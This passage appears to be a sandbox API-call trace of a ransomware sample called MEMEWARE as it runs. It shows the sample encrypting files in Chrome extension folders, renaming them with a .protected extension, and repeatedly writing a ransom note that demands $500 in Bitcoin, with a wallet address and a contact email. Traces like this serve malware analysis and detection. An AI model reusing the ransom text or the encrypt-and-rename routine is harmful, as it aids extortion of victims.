lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.030] CloseHandle (hObject=0x168) returned 1 [0084.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.protected") returned 177 [0084.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0084.030] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.030] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.030] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 171 [0084.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.031] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.032] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.032] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.032] CloseHandle (hObject=0x164) returned 1 [0084.032] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0084.032] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0084.032] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\RESTORE_FILES.txt") returned 165 [0084.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0084.032] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.032] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0084.033] lstrlenA (lpString="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") returned 684 [0084.033] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0084.033] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.033] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.033] CloseHandle (hObject=0x160) returned 1 [0084.033] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0084.033] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned 148 [0084.033] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0084.033] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*") returned 150 [0084.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0084.034] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
[0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\.") returned 150 [0084.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.034] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\..") returned 151 [0084.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.034] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.034] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0084.034] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0084.035] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0084.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0084.035] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.046] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.046] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.046] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.046] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0084.047] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0084.047] CloseHandle (hObject=0x164) returned 1 [0084.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected") returned 179 [0084.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0084.047] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0084.047] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0084.048] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0084.048] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0084.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0084.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0084.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0084.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json") returned 171 [0084.048] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0084.048] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.051] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.051] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.052] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.052] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0084.052] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0084.052] CloseHandle (hObject=0x164) returned 1 [0084.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected") returned 181 [0084.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.protected")) returned 1 [0084.052] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0084.052] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0084.052] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\RESTORE_FILES.txt") returned 166 [0084.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0084.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.065] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0084.066] lstrlenA 